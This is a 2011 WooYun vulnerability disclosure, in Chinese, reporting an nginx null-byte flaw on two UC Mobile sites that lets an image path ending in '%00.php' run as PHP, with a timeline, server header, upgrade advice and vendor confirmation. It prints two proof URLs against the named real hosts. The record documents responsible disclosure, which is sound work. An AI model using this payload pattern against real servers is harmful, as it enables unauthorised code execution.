漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02742
漏洞标题:UC Ngnix空字节执行
相关厂商:UC Mobile
漏洞作者: popok
提交时间:2011-08-27 22:10
修复时间:2011-09-26 22:11
公开时间:2011-09-26 22:11
漏洞类型:命令执行
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-08-27: 细节已通知厂商并且等待厂商处理中
2011-09-01: 厂商已经确认,细节仅向厂商公开
2011-09-11: 细节向核心白帽子及相关领域专家公开
2011-09-21: 细节向普通白帽子公开
2011-10-01: 细节向实习白帽子公开
2011-09-26: 细节向公众公开
简要描述:
详细说明:
http://my.uc.cn/images/mydisk_sample.jpg%00.php
http://bbs.uc.cn/images/default/logo.gif%00.php
幸亏bbs图片目录设置过权限,不然就被捅菊花了
漏洞证明:
Server: nginx/0.7.62
Date: Sat, 27 Aug 2011 14:08:28 GMT
Content-Type: text/html
................
修复方案:
随便一找就2个站,看了下,uc的nginx版本都很低,赶紧抽空升级一下呗!!
版权声明:转载请注明来源 popok@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2011-09-01 10:11
厂商回复:
感谢提醒,已经联系相关人员进行修复,谢谢!
最新状态:
暂无